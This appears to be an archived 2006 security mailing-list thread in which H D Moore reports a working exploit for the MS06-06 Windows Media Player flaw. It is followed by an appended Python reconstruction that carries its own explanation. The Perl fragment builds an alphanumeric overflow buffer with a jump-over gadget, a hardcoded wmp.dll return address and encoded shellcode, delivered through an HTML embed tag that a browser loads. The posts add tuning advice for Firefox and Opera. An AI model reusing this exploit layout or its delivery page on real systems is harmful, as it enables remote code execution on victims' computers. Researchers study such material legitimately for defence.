Message-ID: <200602161941.05387.fdlist@digitaloffense.net>
Date: Fri Feb 17 01:41:15 2006
From: fdlist at digitaloffense.net (H D Moore)
Subject: MS06-06 Windows Media Player Exploitation

Got it working finally :-) The alpha shellcode stuff is actually
Skylined's (ported to Perl), the non-alpha prefix is only used if you
don't pass GETPCTYPE=win32 for PexAlphaNum or GETPCTYPE=seh for Alpha2. I
am using an address in wmp.dll (v9) and tested it successfully on Firefox
and Opera. Time to start porting to v10 and have it auto-detect the WMP
version. Keep your SRC path less than 4K or you end up smashing the PEB's
module list pointers (at least with Firefox)...

-HD

<code>
my $addr = 0x07694b1e; # wmp.dll v9.00.00.2980
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $pattern   = Pex::Text::AlphaNumText(4096);

# "ABC=" decodes as inc ecx / inc edx / inc ebx / cmp eax, imm32 (opcode 0x3D);
# the cmp swallows the four address bytes that follow, so when execution
# starts at offset 2082 it falls through into the shellcode at 2090 without
# needing a non-alphanumeric short jmp.
substr($pattern, 2082, 4, "ABC=");
substr($pattern, 2086, 4, pack('V', $addr));   # little-endian address in wmp.dll
substr($pattern, 2090, length($shellcode), $shellcode);

my $content   = "<html><body><embed type=\"application/x-mplayer2\" src=\"$pattern.wmv\"></body></html>";
</code>

On Thursday 16 February 2006 19:15, c0ntex wrote:
> On 16/02/06, H D Moore <fdlist@...italoffense.net> wrote:
> > Still getting some annoying crashes (SEH trick in alphanum code is
> > annoying when you are trying to debug something...), but the basic
> > solution is:
>
> Ye, we are on the same path if you looked at my notes, SEH works
> flawlessly and can redirect no problem, but getting the stable
> location to have it go is the problem. I had to reject the "pass
> shellcode in the src="" method as I am finding your Alpha shellcode
> sketchy and not 100% alpha :p due to the FF and other annoying
> characters, which cause it to bork.
>
> I'm working on another method which is looking more realistic but I
> need to wait til tomorrow now as I need to sleep  :)
>
> --
>
> regards
> c0ntex
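The layout in the Perl fragment above rests on one trick: the bytes "ABC=" placed just before the overwritten address decode as three harmless incs and a cmp eax, imm32 whose immediate is the address itself, so execution falls straight through into the shellcode at 2090. The block below is an added example, not code from the post or from Metasploit: it rebuilds the same buffer layout in Python, runs a minimal x86 decoder over the 8 gadget bytes to confirm they end exactly at the shellcode offset, and lists which bytes of the buffer are not alphanumeric (the point c0ntex raises about the payload having to survive the src="" attribute). The filler and the placeholder shellcode are constructed here and are not a real payload; the offsets and the wmp.dll address are the ones from the post.

```python
import string
import struct

# Added example, not code from the post or from Metasploit. It rebuilds the
# buffer layout of the Perl fragment and checks that "ABC=" plus the handler
# address decodes as harmless x86 ending exactly at the shellcode offset, and
# which buffer bytes fall outside [A-Za-z0-9].

ADDR = 0x07694B1E        # wmp.dll v9.00.00.2980 address from the post
GADGET_OFF = 2082        # "ABC="
ADDR_OFF = 2086          # pack('V', $addr)
SHELL_OFF = 2090         # shellcode
PATTERN_SIZE = 4096

# Constructed placeholder: alphanumeric bytes standing in for the encoded
# payload. It is not real shellcode.
FAKE_SHELLCODE = b"VTX30VX4A0B6HH0B30BCVX2BDBH4A2AD0ADTBDQB0ADAVX4Z8BDJOM"

ALNUM = frozenset((string.ascii_letters + string.digits).encode())
REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def build_pattern(shellcode: bytes, size: int = PATTERN_SIZE) -> bytes:
    """Alphanumeric filler (stand-in for Pex::Text::AlphaNumText) with the
    gadget, address and shellcode spliced in at the Perl fragment's offsets."""
    filler = (string.ascii_letters + string.digits).encode()
    buf = bytearray((filler * (size // len(filler) + 1))[:size])
    buf[GADGET_OFF:GADGET_OFF + 4] = b"ABC="
    buf[ADDR_OFF:ADDR_OFF + 4] = struct.pack("<I", ADDR)      # same as pack('V', $addr)
    buf[SHELL_OFF:SHELL_OFF + len(shellcode)] = shellcode
    return bytes(buf)


def decode_span(buf: bytes, start: int, end: int):
    """Tiny x86 decoder for only the opcodes the gadget relies on:
    0x40-0x47 = inc r32 (1 byte), 0x3D = cmp eax, imm32 (5 bytes).
    Returns the instruction list and the offset just after the last one,
    so a caller can see that nothing straddles the shellcode boundary."""
    pos, insns = start, []
    while pos < end:
        op = buf[pos]
        if 0x40 <= op <= 0x47:
            insns.append(f"inc {REGS32[op - 0x40]}")
            pos += 1
        elif op == 0x3D:
            imm = struct.unpack_from("<I", buf, pos + 1)[0]
            insns.append(f"cmp eax, 0x{imm:08x}")
            pos += 5
        else:
            raise ValueError(f"opcode 0x{op:02x} at {pos} is not part of the gadget")
    return insns, pos


def non_alnum_offsets(buf: bytes):
    """Offsets of every byte outside [A-Za-z0-9]: the bytes that must reach
    the target unmodified through the src="" attribute."""
    return [i for i, b in enumerate(buf) if b not in ALNUM]


if __name__ == "__main__":
    pat = build_pattern(FAKE_SHELLCODE)
    insns, after = decode_span(pat, GADGET_OFF, SHELL_OFF)
    print("gadget:", "; ".join(insns), f"(next instruction at {after})")
    print("non-alphanumeric bytes at:", non_alnum_offsets(pat))
```

With the placeholder payload, the only non-alphanumeric bytes left in the 4096-byte string are the "=" of the gadget and the two low bytes of the address (0x1e and 0x07); "K" and "i" in the middle of the address happen to be printable. That is the whole cost of the trick, and it is what has to survive whichever browser builds the src path.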
